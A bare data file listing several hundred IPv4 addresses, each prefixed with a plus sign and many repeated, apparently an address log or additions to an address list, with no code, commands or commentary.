+142.132.170.212 +179.84.99.210 +45.162.68.29 +12.24.255.162 +203.121.77.230 +167.61.203.173 +45.236.240.90 +179.152.227.125 +94.96.22.2 +13.59.34.78 +177.98.218.188 +211.49.98.67 +45.236.240.90 +187.121.110.227 +45.236.240.90 +201.217.158.170 +45.236.240.90 +177.205.114.137 +187.65.39.163 +185.29.79.192 +179.95.68.253 +138.122.167.5 +45.7.234.12 +217.12.25.37 +64.126.66.211 +186.57.96.91 +193.164.138.11 +191.251.46.145 +66.208.253.177 +45.160.27.92 +3.95.45.247 +52.71.123.26 +45.162.68.29 +180.247.222.173 +45.236.240.90 +117.201.26.213 +89.187.66.108 +117.193.206.171 +66.146.127.27 +117.217.215.179 +59.88.191.62 +117.221.2.141 +117.207.73.2 +45.236.240.90 +200.129.147.21 +60.51.208.108 +59.92.239.243 +117.206.129.247 +117.193.66.96 +117.207.78.32 +117.201.19.102 +117.193.71.42 +186.50.43.181 +117.221.242.111 +117.217.215.21 +186.233.189.22 +117.222.143.45 +59.91.154.50 +35.182.247.116 +117.200.158.104 +117.222.138.177 +117.202.141.112 +103.4.44.163 +117.222.141.152 +117.222.139.184 +59.93.68.50 +59.88.178.35 +117.221.137.234 +59.92.185.63 +41.74.70.14 +59.92.86.63 +117.222.139.123 +186.48.52.67 +117.206.122.167 +59.91.158.91 +117.222.136.206 +59.96.230.99 +117.193.69.18 +117.207.122.83 +186.210.95.229 +59.91.155.215 +45.236.240.90 +117.241.217.227 +59.93.163.243 +179.178.193.211 +117.222.141.164 +117.200.153.176 +117.222.138.197 +117.222.142.73 +14.186.104.237 +59.96.193.250 +191.250.4.199 +59.96.225.86 +117.221.1.173 +117.201.20.168 +61.3.243.115 +3.26.144.140 +59.92.191.121 +117.197.196.163 +59.96.225.69 +117.207.65.209 +117.207.71.89 +117.222.140.214 +177.87.10.187 +175.139.128.121 +41.230.11.126 +45.236.240.90 +216.82.204.206 +185.36.2.7 +180.183.96.131 +183.88.214.182 +3.239.10.72 +66.146.127.10 +191.251.33.158 +51.75.79.185 +177.18.137.19 +3.106.137.242 +96.82.34.250 +189.105.219.58 +189.32.130.135 +44.202.33.132 +45.236.240.90 +124.120.86.116 +187.107.110.66 +45.236.240.90 +45.236.240.90 +186.213.124.53 +45.236.240.90 +190.134.219.75 +187.65.7.158 +200.193.159.153 +191.248.32.114 +45.236.240.90 +120.138.8.73 +187.58.32.45 +191.33.231.108 +212.75.174.210 +179.222.122.126 +201.62.94.146 +201.48.62.9 +45.236.240.90 +41.96.11.115 +117.221.9.211 +45.236.240.90 +69.46.7.35 +177.134.97.126 +186.113.6.89 +41.140.235.143 +179.104.163.87 +45.236.240.90 +45.236.240.90 +94.96.60.112 +45.236.240.90 +105.156.94.192 +115.129.4.24 +201.35.4.71 +190.133.7.189 +79.120.193.70 +41.96.46.148 +41.96.11.115 +34.72.194.131 +175.141.90.189 +117.222.137.144 +183.88.214.182 +177.85.2.80 +45.236.240.90 +117.222.141.73 +175.139.130.60 +213.74.242.18 +138.122.155.187 +42.189.59.178 +13.58.61.61 +45.236.240.90 +200.175.235.147 +34.72.194.131 +115.133.48.197 +100.26.245.113 +160.177.144.127 +45.236.240.90 +191.31.6.84 +45.236.240.90 +81.42.255.38 +58.229.184.214 +37.104.95.183 +196.89.172.53 +41.96.71.16 +41.96.71.16 +177.10.197.141 +13.245.231.239 +45.236.240.90 +117.202.140.197 +186.54.126.80 +83.110.97.171 +201.48.114.12 +138.201.69.178 +37.104.95.183 +41.96.3.123 +186.210.95.152 +167.60.71.70 +177.18.62.97 +52.252.26.222 +45.236.240.90 +41.142.80.12 +41.96.3.123 +179.178.95.77 +193.230.241.11 +191.54.57.172 +175.139.245.32 +116.203.60.15 +45.236.240.90 +181.24.156.88 +177.158.9.21 +179.26.109.141 +186.52.238.33 +121.121.92.40 +171.22.25.127 +179.219.66.207 +183.88.214.182 +183.88.214.182 +45.236.15.205 +45.236.240.90 +41.96.136.110 +41.96.129.220 +177.191.147.65 +115.130.136.20 +52.25.226.33 +34.205.7.5 +189.63.2.37 +195.175.62.226 +54.173.108.44 +34.205.7.5 +196.89.176.59 +50.248.13.180 +201.49.124.156 +41.96.66.19 +143.0.151.115 +190.134.227.121 +187.32.191.208 +94.96.23.20 +196.64.78.138 +179.26.25.111 +41.96.173.168 +13.208.240.214 +45.236.240.90 +45.236.240.90 +183.88.214.182 +23.94.25.186 +45.236.240.90 +177.53.126.206 +45.236.240.90 +45.236.240.90 +72.32.66.27 +72.32.66.26 +45.236.240.90 +177.30.82.95 +45.236.240.90 +183.88.214.182 +36.81.126.42 +115.133.86.90 +115.133.107.250 +183.88.214.182 +191.54.21.133 +183.88.214.182 +118.101.27.147 +189.112.72.168 +191.54.132.177 +105.156.18.227 +59.99.210.197 +181.24.137.178 +117.221.14.15 +167.60.118.212 +97.107.137.71 +186.50.45.108 +59.88.190.34 +117.202.136.89 +59.92.83.165 +117.206.123.157 +117.213.32.15 +117.222.138.11 +117.222.138.43 +117.222.138.7 +117.212.177.15 +117.202.68.125 +117.217.215.225 +117.215.182.246 +117.193.202.132 +61.3.204.24 +117.201.28.84 +117.207.65.184 +59.92.98.142 +117.222.141.80 +117.217.213.108 +60.53.16.197 +117.222.136.9 +117.193.206.174 +117.212.179.52 +117.213.106.88 +117.222.139.33 +117.200.149.217 +117.221.242.13 +117.217.212.105 +117.221.5.237 +117.207.73.170 +59.96.227.230 +59.92.239.131 +45.236.240.90 +204.2.62.60 +117.212.183.143 +59.93.68.22 +59.89.199.43 +59.98.57.93 +117.221.138.120 +59.92.188.231 +191.33.237.57 +117.201.24.149 +45.236.240.90 +179.26.61.169 +13.245.4.86 +117.207.78.191 +117.221.15.52 +186.19.237.235 +167.60.133.132 +117.207.77.164 +117.221.7.238 +117.193.201.133 +59.88.186.188 +59.89.199.187 +41.96.246.46 +117.222.140.250 +117.221.0.157 +190.133.175.162 +45.175.144.135 +92.154.23.19 +41.96.246.46 +59.91.18.154 +183.88.214.182 +45.236.240.90 +105.159.181.207 +196.89.172.61 +179.26.24.73 +94.99.119.147 +118.173.234.218 +45.236.240.90 +45.236.240.90 +88.16.215.88 +45.236.240.90 +187.67.250.176 +189.124.232.27 +183.88.214.182 +117.221.0.197 +138.201.0.109 +117.241.41.72 +179.216.18.42 +183.88.214.182 +183.88.214.182 +183.88.214.182 +167.60.152.85 +190.134.223.141 +186.50.45.91 +200.131.224.16 +94.154.57.21 +175.139.226.136 +41.96.58.134 +190.134.223.141 +138.201.69.176 +41.98.1.119 +3.95.80.38 +191.55.198.152 +180.248.62.48 +162.55.218.31 +50.248.13.180 +201.48.143.150 +202.188.218.216 +195.235.86.49 +146.148.33.251 +177.220.191.202 +76.78.67.27 +200.165.167.51 +45.236.240.90 +177.30.81.135 +183.88.214.182 +45.236.240.90 +177.142.104.146 +59.88.190.72 +59.88.190.33 +177.177.92.144 +12.24.255.164 +138.201.69.181 +138.201.69.183 +34.254.246.199 +189.63.2.54 +187.59.248.85 +52.34.3.44 +189.27.112.177 +45.236.240.90 +177.3.225.165 +183.88.214.182 +189.63.83.130 +203.196.40.169 +45.236.240.90 +45.236.240.90 +179.95.82.9 +191.54.57.155 +45.236.240.90 +179.126.69.0 +45.236.240.90 +188.52.28.39 +183.88.214.182 +179.26.221.42 +44.198.233.87 +41.140.58.206 +188.52.43.49 +179.26.78.15 +41.216.125.150 +177.98.145.43 +41.96.150.134 +183.88.214.182 +103.126.6.236 +191.251.39.144 +45.236.240.90 +177.106.154.33 +179.232.228.235 +183.88.214.182 +13.245.117.201 +171.22.25.127 +187.49.72.215 +115.133.60.234 +59.92.94.148 +45.236.240.90 +132.255.34.159 +183.88.214.182 +196.77.164.38 +82.113.183.58 +183.88.214.182 +171.22.25.127 +179.176.135.216 +23.111.106.183 +189.154.193.67 +183.88.214.182 +13.229.34.124 +138.122.164.23 +191.54.229.124 +60.54.212.75 +79.217.84.250 +41.96.172.17 +41.96.182.44 +117.194.133.154 +201.47.224.156 +117.202.186.141 +167.60.157.232 +200.98.128.77 +186.55.29.50 +177.159.77.244 +117.241.43.168 +175.139.225.174 +37.104.70.227 +117.202.138.123 +200.131.224.16 +59.95.162.66 +117.202.139.201 +117.201.25.143 +117.222.140.164 +186.213.84.170 +61.2.33.100 +61.3.242.102 +45.236.240.90 +117.221.135.255 +117.212.180.199 +35.88.81.165 +117.202.137.114 +59.89.193.95 +59.92.187.21 +177.50.163.25 +117.221.6.166 +117.221.233.243 +89.231.194.18 +183.88.214.182 +41.96.172.17 +117.213.38.21 +45.236.240.90 +59.88.183.126 +59.96.229.147 +117.221.5.36 +117.207.78.94 +117.202.137.171 +117.212.180.108 +186.50.186.55 +117.221.7.145 +117.222.140.54 +117.222.139.244 +117.222.137.230 +117.206.130.35 +177.207.226.250 +117.202.140.71 +117.212.191.164 +117.213.110.165 +117.207.65.186 +181.24.142.220 +117.222.142.26 +59.91.148.182 +117.193.203.190 +117.206.123.26 +117.202.138.73 +59.88.189.175 +117.217.215.236 +191.54.57.209 +117.222.138.69 +59.96.193.148 +105.157.128.155 +117.217.215.237 +177.159.196.134 +59.91.144.111 +117.213.32.193 +117.194.134.86 +61.3.205.5 +59.92.81.1 +41.96.207.173 +96.77.104.46 +187.60.237.163 +186.55.29.50 +106.201.236.206 +183.88.214.182 +59.91.20.238 +45.236.240.90 +80.15.195.109 +124.120.143.243 +45.236.240.90 +103.211.80.23 +183.88.214.182 +183.88.214.182 +183.88.214.182 +45.236.240.90 +201.48.182.186 +200.165.167.51 +183.88.60.75 +45.236.240.90 +3.93.110.240 +82.113.183.57 +46.186.44.174 +191.31.77.227 +152.228.220.233 +45.236.240.90 +177.132.181.128 +13.245.6.3 +183.88.214.182 +200.150.180.204 +177.132.225.14 +189.110.241.184 +183.88.214.182 +191.31.104.63 +179.95.115.198 +115.133.70.27 +191.35.254.164 +36.84.189.161 +160.179.86.230 +183.88.214.182 +191.251.37.32 +200.129.102.29 +45.236.240.90 +200.98.200.220 +200.98.201.70 +183.88.214.182 +190.113.232.231 +187.57.13.225 +89.231.198.246 +46.186.47.205 +183.88.214.182 +45.236.240.90 +59.91.16.245 +45.236.240.90 +41.96.34.54 +179.26.49.34 +179.67.95.218 +183.88.214.182 +177.50.168.42 +186.52.161.217 +200.98.161.94 +45.236.240.90 +191.54.133.37 +177.69.90.41 +179.26.238.25 +41.96.126.63 +45.184.68.166 +92.223.184.229 +41.96.115.10 +200.129.179.235 +13.234.38.170 +186.214.217.75 +45.236.240.90 +175.145.109.55 +13.245.108.212 +87.240.222.166 +54.75.168.58 +117.241.40.195 +61.0.121.221 +117.222.140.32 +189.154.87.114 +59.96.224.25 +117.221.246.251 +179.24.214.107 +181.24.143.252 +117.197.193.145 +200.187.169.29 +132.247.197.92 +177.50.178.33 +59.91.155.43 +117.202.78.98 +200.98.130.101 +117.207.77.221 +117.213.71.115 +117.201.26.248 +94.99.111.20 +45.236.240.90 +195.28.79.36 +117.202.138.104 +45.236.240.90 +130.255.92.3 +41.39.207.194 +45.236.240.90 +179.26.28.185 +45.236.240.90 +189.63.83.164 +183.88.214.182 +183.88.214.182 +167.56.102.151 +191.250.61.172 +177.159.132.87 +186.50.99.235 +78.141.134.124 +41.96.31.132 +15.206.80.82 +41.224.247.158 +183.88.214.182 +168.228.181.189 +66.216.155.84 +200.146.241.193 +181.15.118.2 +45.236.240.90 +188.19.13.70 +124.120.143.156 +191.31.19.223 +201.57.121.26 +190.112.56.10 +45.236.240.90 +179.181.8.67 +179.182.143.199 +66.216.155.84 +187.115.227.149 +180.253.91.202 +65.124.130.211 +200.98.142.57 +102.53.51.14 +183.88.214.182 +212.67.44.184 +200.98.201.71 +200.98.66.174 +179.104.162.186 +200.98.130.101 +132.247.197.92 +115.135.229.17 +103.234.186.83 +177.106.94.156 +37.104.66.120 +200.165.167.51 +149.202.41.22 +183.88.214.182 +183.88.214.182 +45.236.240.90 +41.96.150.154 +41.96.70.58 +177.206.142.56 +183.88.214.182 +179.104.167.112 +200.98.200.108 +200.98.69.209 +186.214.242.50 +45.236.240.90 +41.96.206.126 +13.57.219.74 +45.236.240.90 +41.96.228.62 +87.120.225.12 +3.13.79.235 +96.75.238.1 +179.97.97.169 +45.236.240.90 +183.88.214.182 +171.22.25.127 +189.206.226.10 +157.175.43.200 +45.236.240.90 +201.11.18.253 +45.236.223.85 +183.88.214.182 +82.114.168.10 +183.88.214.182 +171.22.25.127 +191.220.45.71 +96.38.246.154 +191.54.225.148 +181.24.156.16 +179.24.212.121 +187.65.232.162 +183.88.214.182 +191.54.128.227 +117.221.4.50 +177.191.2.48 +41.96.86.234 +195.201.78.170 +167.56.58.127 +45.236.240.90 +70.25.34.211 +189.231.121.2 +45.236.240.90 +117.206.130.19 +187.59.225.209 +117.241.41.124 +177.132.231.67 +179.24.164.66 +201.47.223.26 +117.212.191.53 +177.96.209.5 +183.88.214.182 +183.88.214.182 +117.202.143.238 +167.57.230.106 +105.154.42.104 +59.89.194.124 +195.167.92.234 +196.218.245.44 +186.48.43.73 +45.236.240.90 +41.140.81.226 +59.92.94.0 +118.101.246.180 +45.236.240.90 +177.50.170.68 +186.218.200.80 +189.38.188.94 +187.74.114.104 +177.204.32.88 +183.88.214.182 +183.88.214.182 +183.88.214.182 +177.157.79.153 +191.217.188.147 +45.236.240.90 +179.178.207.68 +203.77.233.167 +45.236.240.90 +45.236.240.90 +45.236.240.90 +52.203.68.164 +13.244.104.201 +191.31.9.202 +183.88.214.182 +212.78.97.149 +212.78.97.155 +201.42.181.55 +45.236.240.90 +201.87.109.192 +54.38.80.23 +66.216.9.195 +80.190.64.5 +42.189.38.165 +13.244.157.174 +187.18.163.210 +115.133.70.105 +52.203.68.164 +45.236.240.90 +105.156.68.57 +35.226.87.181 +45.236.240.90 +83.249.25.215 +41.96.39.67 +210.116.109.170 +191.33.8.158 +41.96.22.188 +201.47.199.154 +13.229.34.124 +94.99.108.148 +189.114.0.179 +41.142.227.150 +192.149.255.21 +186.54.247.93 +212.78.97.155 +212.78.97.149 +212.78.97.150 +89.231.195.233 +171.97.53.247 +179.26.27.78 +45.236.240.90 +177.209.88.178 +179.110.157.19 +200.187.171.50 +181.206.14.31 +186.210.91.29 +186.211.75.238 +187.112.47.62 +45.236.240.90 +177.106.59.234 +191.250.1.74 +45.236.240.90 +200.187.60.170 +61.3.197.187 +170.76.160.60 +216.207.192.133 +183.88.214.182 +13.229.34.124 +200.194.172.19 +201.16.184.152 +183.88.214.182 +45.236.240.90 +201.68.229.40 +117.213.37.142 +183.88.214.182 +183.88.214.182 +45.236.240.90 +191.35.255.254 +45.236.240.90 +191.31.26.165 +171.22.25.127 +186.193.181.120 +179.126.74.81 +179.104.164.154 +181.24.153.41 +167.60.76.92 +190.15.17.8 +2.89.104.98 +41.96.161.186 +115.134.194.218 +189.63.222.107 +117.201.30.195 +175.139.209.97 +117.197.203.151 +186.52.197.24 +117.221.11.18 +59.92.93.182 +117.213.76.102 +191.55.197.187 +117.217.213.49 +117.201.20.89 +117.194.140.208 +117.212.186.65 +59.92.91.126 +59.88.187.240 +105.155.102.130 +117.202.67.202 +117.213.33.10 +59.92.84.216 +117.197.202.88 +59.96.193.136 +201.6.101.183 +59.90.85.52 +117.207.79.166 +117.221.3.99 +69.46.7.35 +190.147.238.69 +45.236.240.90 +177.50.178.215 +179.186.32.196 +177.133.51.10 +200.181.189.23 +187.39.28.56 +121.121.90.221 +45.236.240.90 +186.210.87.111 +200.187.60.222 +200.187.60.176 +45.236.240.90 +200.187.60.111 +183.88.214.182 +200.187.13.104 +31.199.12.148 +177.205.80.190 +200.187.60.114 +200.187.4.8 +187.121.103.205 +200.187.60.104 +200.187.60.77 +191.55.192.167 +189.27.125.242 +189.59.212.161 +183.88.214.182 +191.184.231.172 +102.53.49.6 +201.22.182.46 +69.164.109.144 +103.106.21.154 +200.179.75.143 +44.202.105.202 +210.213.238.98 +45.236.240.90 +144.76.112.246 +45.236.240.90 +41.96.40.89 +187.66.155.247 +94.96.6.36 +189.112.49.224 +179.26.45.231 +186.48.158.184 +196.65.88.228 +41.98.15.132 +188.52.37.23 +175.141.26.159 +179.162.160.109 +167.57.181.230 +45.236.240.90 +177.133.245.30 +200.174.126.167 +179.187.252.202 +191.187.123.252 +183.88.214.182 +94.99.104.172 +138.0.125.32 +212.78.97.152 +82.147.57.110 +47.34.189.158 +200.187.60.123 +187.121.13.66 +186.55.13.55 +187.8.223.70 +37.104.103.208 +41.96.120.147 +200.187.60.12 +191.54.130.148 +200.187.60.175 +200.187.4.40 +177.45.80.151 +187.36.227.165 +41.96.120.147 +41.98.15.132 +179.159.145.137 +182.73.135.130 +179.126.7.120 +171.22.25.127 +125.27.230.60 +104.156.56.44 +179.24.161.141 +41.96.116.40 +179.98.207.109 +45.236.240.90 +13.208.121.17 +183.88.214.182 +94.140.123.36 +45.236.240.90 +183.88.214.182 +45.236.240.90 +177.133.61.242 +201.95.192.51 +179.126.4.112 +183.88.214.182 +45.236.240.90 +201.29.71.97 +187.122.238.152 +187.19.165.125 +88.4.154.115 +177.157.85.86 +45.236.240.90 +45.236.240.90 +191.31.16.141 +177.132.250.193 +187.87.39.39 +177.63.232.247 +177.158.6.34 +186.213.212.122 +187.115.174.44 +183.88.214.182 +179.187.37.219 +45.4.144.96 +177.16.198.137 +41.96.79.75 +179.178.228.193 +54.64.241.63 +183.88.214.182 +190.133.161.254 +186.210.90.31 +196.65.92.78 +60.49.103.208 +189.112.151.137 +41.98.25.249 +167.60.7.204 +177.42.53.207 +85.121.32.35 +2.89.80.31 +201.86.224.237 +138.122.164.166 +45.236.240.90 +171.22.25.127 +59.91.144.79 +191.35.52.192 +190.137.11.247 +45.236.240.90 +94.96.21.251 +45.236.240.90 +41.96.109.103 +59.92.181.6 +167.61.204.181 +117.221.233.78 +117.221.242.52 +186.57.112.229 +59.92.103.226 +117.221.12.186 +45.236.240.90 +117.197.205.169 +117.221.0.123 +191.54.142.167 +117.197.198.178 +191.45.37.91 +117.221.240.41 +117.213.32.244 +59.91.151.175 +117.221.240.172 +183.88.214.182 +179.84.69.195 +189.5.145.220 +45.236.240.90 +183.88.214.182 +177.134.174.155 +212.78.97.150 +191.251.46.39 +105.159.182.11 +45.236.240.90 +103.19.199.158 +213.240.141.220 +212.78.97.152 +198.51.63.156 +177.47.145.33 +187.86.212.136 +213.240.141.206 +183.88.214.182 +187.86.212.153 +212.198.251.245 +216.207.192.32 +35.169.8.251 +45.236.240.90 +183.88.214.182 +61.5.124.192 +175.136.214.71 +20.121.11.213 +170.80.70.18 +91.221.50.122 +191.33.163.173 +183.88.214.182 +117.241.42.34 +179.26.145.6 +175.139.40.83 +186.210.25.54 +191.33.94.163 +35.209.72.20 +41.96.184.105 +45.236.240.90 +200.142.121.214 +187.107.178.188 +183.88.214.182 +179.24.238.234 +41.202.224.20 +94.96.21.251 +179.24.234.92 +183.88.214.182 +46.186.40.62 +171.97.53.201 +189.79.118.148 +177.126.78.19 +41.96.4.103 +45.236.240.90 +183.88.214.182 +41.74.188.195 +54.162.98.33 +189.110.88.80 +179.187.204.125 +201.34.143.113 +59.92.187.121 +179.181.80.83 +200.175.247.212 +45.236.240.90 +78.30.57.2 +183.88.214.182 +168.205.38.208 +86.98.152.125 +186.251.79.39 +183.88.214.182 +190.133.250.25 +212.75.174.200 +194.236.6.234 +212.75.174.211 +201.33.200.162 +179.162.79.112 +186.57.104.130 +177.75.184.161 +187.44.93.107 +201.87.106.193 +191.250.52.13 +179.26.64.70 +187.95.103.141 +179.180.206.160 +177.75.184.170 +41.96.44.124 +187.113.32.129 +183.88.214.182 +177.50.162.79 +179.158.237.161 +177.222.146.17 +41.96.252.245 +191.250.10.114 +101.50.62.61 +108.160.176.33 +108.160.176.2 +167.60.41.150 +195.57.30.9 +85.171.185.53 +41.142.234.252 +2.50.25.210 +187.39.93.85 +102.53.60.35 +183.88.214.182 +191.54.129.127 +179.162.204.109 +15.152.36.61 +34.245.104.173 +160.177.149.120 +183.88.214.182 +179.176.119.72 +2.89.95.68 +190.134.1.198 +2.89.85.35 +41.96.88.117 +189.110.88.106 +200.117.153.147 +177.96.55.27 +34.205.159.126 +189.27.6.108 +185.210.127.20 +179.104.163.94 +179.183.36.82 +105.158.76.218 +175.140.72.121 +125.27.192.151 +191.33.114.101 +189.27.29.175 +179.199.5.195 +45.236.240.90 +179.219.45.0 +3.26.201.183 +45.236.240.90 +41.141.82.238 +41.98.115.21 +124.13.22.248 +45.236.240.90 +183.88.214.182 +179.247.132.77 +183.88.214.182 +179.104.167.94 +201.48.102.202 +177.18.222.79 +59.89.206.222 +189.26.221.26 +186.48.130.197 +187.21.231.163 +41.98.115.21 +177.159.135.147 +41.96.147.42 +186.52.140.58 +59.96.227.252 +187.58.34.124 +59.92.103.191 +110.159.240.116 +117.202.73.35 +59.88.177.158 +59.96.53.247 +61.3.194.178 +59.92.92.255 +117.221.5.160 +117.213.68.145 +59.92.176.113 +186.57.89.121 +117.200.158.47 +117.201.20.255 +59.88.190.129 +117.241.78.29 +117.206.130.101 +179.98.25.159 +117.212.187.59 +117.222.136.88 +201.6.149.109 +183.88.214.182 +105.157.121.101 +186.212.88.219 +187.86.212.156 +187.59.251.70 +177.158.31.49 +87.190.252.60 +179.26.35.61 +121.122.124.25 +189.73.181.166 +175.140.73.40 +41.140.191.180 +191.54.131.26 +36.81.170.36 +179.179.154.129 +86.242.65.58 +58.71.206.232 +177.75.184.160 +102.53.57.140 +201.33.195.150 +177.189.207.155 +45.236.240.90 +45.236.240.90 +183.88.214.182 +86.242.65.58 +85.13.244.246 +171.22.25.127 +183.88.214.182 +175.136.235.86 +41.96.101.167 +177.52.212.146 +41.96.244.58 +186.57.87.108 +186.210.91.114 +207.253.15.193 +167.60.39.201 +37.104.64.221 +52.73.104.74 +219.92.154.212 +194.176.109.178 +186.50.41.114 +34.231.31.252 +179.183.100.51 +86.98.27.205 +179.156.115.202 +185.210.127.20 +42.189.13.94 +194.176.109.178 +183.88.214.182 +83.135.62.53 +187.112.47.119 +179.95.106.145 +180.183.116.86 +41.140.239.95 +189.78.124.20 +41.96.63.4 +37.104.81.157 +52.2.145.164 +175.138.4.78 +44.224.117.103 +177.206.227.40 +179.26.62.158 +45.236.240.90 +205.215.250.70 +41.96.54.165 +187.121.0.172 +41.96.255.147 +81.32.15.232 +189.68.76.73 +201.22.182.12 +177.133.44.32 +201.86.225.130 +207.35.200.162 +177.23.88.62 +183.88.214.182 +41.140.9.31 +183.88.214.182 +177.96.208.120 +41.96.116.99 +219.92.24.105 +179.187.251.229 +80.241.89.36 +196.203.50.173 +183.88.214.182 +45.236.240.90 +175.145.109.34 +186.57.114.191 +37.104.78.7 +116.203.188.126 +177.19.47.80 +41.96.20.152 +113.172.16.221 +94.130.75.86 +45.234.77.248 +183.88.214.182 +189.19.189.16 +191.250.73.135 +160.179.228.147 +80.241.89.36 +179.187.252.156 +45.236.240.90 +116.93.119.175 +1.9.155.195 +175.143.88.149 +125.27.187.93 +59.92.178.210 +3.249.82.239 +117.213.109.53 +59.92.87.249 +75.178.180.12 +190.115.112.160 +45.236.240.90 +45.236.240.90 +189.61.17.126 +189.91.227.228 +41.142.222.77 +175.138.4.121 +36.81.249.219 +175.137.61.61 +210.195.173.138 +200.23.187.63 +117.241.42.201 +80.231.232.22 +94.96.30.56 +41.96.219.187 +45.236.240.90 +186.54.214.93 +179.190.29.19 +196.92.141.59 +89.250.135.58 +181.81.16.199 +177.97.79.25 +45.236.240.90 +105.159.19.169 +113.172.95.54 +94.96.1.151 +179.26.64.215 +179.183.49.89 +201.33.196.110 +195.57.5.109 +175.139.40.197 +60.53.107.69 +186.50.80.61 +191.33.238.207 +41.96.219.187 +187.58.7.68 +189.154.195.162 +117.200.155.182 +117.221.9.76 +104.42.78.52 +80.231.232.27 +105.154.47.212 +61.2.36.122 +167.60.28.66 +117.213.110.149 +59.92.178.142 +59.92.85.150 +117.200.64.172 +1.6.91.58 +179.181.91.11 +104.156.56.44 +202.124.158.198 +81.26.164.19 +179.176.100.170 +45.236.240.90 +200.23.187.63 +183.88.214.182 +45.236.240.90 +61.1.154.28 +117.202.78.149 +16.170.214.138 +61.2.122.48 +117.221.241.233 +59.96.193.92 +59.95.160.245 +59.96.225.3 +191.33.199.103 +217.165.63.42 +52.38.35.108 +105.156.95.122 +186.54.216.159 +189.83.148.144 +187.65.10.243 +191.54.59.168 +177.205.94.24 +177.205.126.117 +189.26.136.235 +41.142.218.144 +18.133.124.121 +177.206.225.59 +218.248.2.251 +186.57.87.170 +41.96.49.140 +177.50.167.192 +187.32.161.250 +103.121.149.26 +175.143.63.214 +186.50.147.77 +45.236.240.90 +201.33.205.200 +41.96.144.226 +175.139.227.54 +179.178.251.123 +195.62.170.195 +75.178.181.50 +183.88.214.182 +183.88.214.182 +138.36.105.211 +216.154.219.26 +41.96.238.223 +82.77.1.254 +41.96.223.34 +117.197.202.6 +186.212.124.124 +186.54.214.245 +207.210.233.92 +167.57.205.232 +200.129.180.61 +41.141.88.23 +185.106.243.175 +131.161.105.212 +187.113.20.57 +124.13.134.159 +45.236.240.90 +45.236.240.90 +168.176.5.20 +75.178.181.50 +196.92.147.145 +18.134.128.122 +189.110.248.33 +191.33.17.12 +45.236.240.90 +177.83.255.104 +180.183.101.13 +179.177.26.129 +83.35.245.102 +183.88.214.182 +177.157.66.252 +186.55.10.189 +191.31.171.127 +200.146.119.126 +204.11.178.243 +207.210.233.92 +186.55.30.247 +45.236.240.90 +183.88.214.182 +138.201.69.180 +179.111.104.165 +191.187.125.68 +183.88.214.182 +177.22.88.205 +117.194.142.112 +177.157.83.254 +189.41.133.80 +138.66.34.62 +201.42.71.221 +187.183.199.136 +177.183.211.156 +199.101.246.196 +186.213.144.234 +200.187.177.160 +117.207.73.215 +179.184.25.106 +12.158.38.235 +117.221.242.216 +177.45.130.53 +117.194.131.189 +189.112.151.139 +45.236.240.90 +119.59.112.225 +177.9.66.191 +45.236.240.90 +179.183.118.123 +200.179.75.143 +177.207.23.116 +189.79.118.107 +186.229.185.109 +179.191.239.172 +212.170.18.70 +105.159.17.224 +186.50.171.10 +189.15.233.211 +177.156.66.111 +59.91.145.82 +59.91.149.104 +59.89.197.81 +177.204.238.203 +191.250.11.0 +117.200.145.103 +41.96.33.233 +216.201.13.171 +60.48.224.19 +189.231.165.61 +177.50.189.216 +41.96.39.82 +94.96.35.247 +189.112.81.107 +186.57.116.18 +45.236.240.90 +175.139.209.111 +167.60.117.135 +200.187.169.140 +193.226.90.201 +200.175.245.77 +177.191.52.26 +209.33.235.197 +209.33.235.196 +45.236.240.90 +191.250.252.171 +177.156.4.121 +200.178.8.205 +191.34.233.136 +177.7.208.139 +200.178.8.145 +213.97.128.61 +183.88.214.182 +177.156.68.186 +200.187.170.74 +45.236.240.90 +191.35.69.106 +34.82.223.21 +183.88.214.182 +45.236.240.90 +62.59.90.15 +209.33.235.197 +41.96.233.181 +115.134.110.83 +61.5.123.127 +196.70.123.41 +177.92.37.194 +177.148.178.132 +94.53.7.20 +177.17.117.217 +201.89.61.208 +209.33.235.196 +117.193.242.129 +46.255.208.70 +168.228.183.147 +45.236.240.90 +217.147.163.194 +217.127.206.251 +194.93.124.113 +189.46.44.58 +194.93.124.203 +37.192.63.84 +41.140.191.56 +201.10.169.75 +77.247.94.131 +186.54.216.58 +45.236.240.90 +83.4.160.248 +86.98.30.1 +186.57.104.180 +191.35.17.138 +168.197.77.53 +94.187.183.10 +179.179.141.89 +110.170.73.5 +194.93.124.113 +179.95.79.245 +44.201.0.203 +179.222.120.176 +209.33.235.196 +177.134.165.19 +45.236.240.90 +183.88.214.182 +187.113.28.109 +5.9.161.150 +5.9.161.145 +189.114.1.158 +177.98.164.216 +83.3.207.234 +18.142.90.86 +201.87.110.4 +45.236.240.90 +45.236.240.90 +177.94.123.25 +18.140.237.14 +209.33.235.197 +196.64.71.198 +3.83.28.49 +187.65.20.135 +179.95.163.252 +152.169.24.31 +94.96.19.137 +177.96.46.158 +45.179.75.107 +45.236.240.90 +188.52.45.57 +41.96.53.150 +18.140.198.29 +41.96.247.26 +189.46.193.92 +177.205.40.192 +66.232.104.106 +183.88.214.182 +61.3.199.231 +152.254.235.206 +152.249.124.99 +183.88.214.182 +45.236.240.90 +186.225.250.98 +177.45.212.85 +196.217.56.61 +191.223.216.183 +179.83.138.179 +191.251.50.53 +187.109.252.239 +66.232.104.106 +196.64.57.129 +101.108.180.54 +200.158.181.189 +190.182.168.2 +182.93.82.233 +189.154.39.135 +177.134.166.222 +191.55.180.206 +186.206.154.1 +200.187.163.91 +138.122.164.147 +175.139.244.190 +179.187.242.19 +41.142.96.254 +177.16.102.130 +186.52.157.129 +81.47.161.120 +160.178.16.225 +41.96.102.51 +189.108.172.122 +117.202.64.154 +200.150.122.71 +191.251.51.22 +190.134.245.14 +191.35.49.229 +186.57.77.150 +41.96.219.39 +177.156.84.249 +167.60.217.157 +83.99.48.129 +191.250.234.200 +179.183.59.143 +115.77.188.84 +196.65.187.208 +179.177.177.241 +175.140.229.29 +81.12.13.140 +103.242.118.249 +216.207.192.225 +41.96.184.141 +196.65.187.208 +200.146.249.38 +210.245.118.37 +103.220.223.161 +81.12.13.142 +85.96.190.207 +45.236.240.90 +191.250.1.174 +41.140.62.197 +186.210.94.255 +177.158.24.103 +60.51.211.15 +45.236.240.90 +179.247.180.64 +183.88.214.182 +190.134.12.89 +179.235.140.172 +183.88.214.182 +128.14.112.98 +171.97.53.105 +105.156.95.144 +2.89.68.63 +189.58.165.62 +41.96.221.91 +41.96.222.161 +186.53.126.53 +187.72.243.119 +121.121.88.73 +115.135.190.229 +179.186.31.219 +117.221.5.127 +34.230.186.5 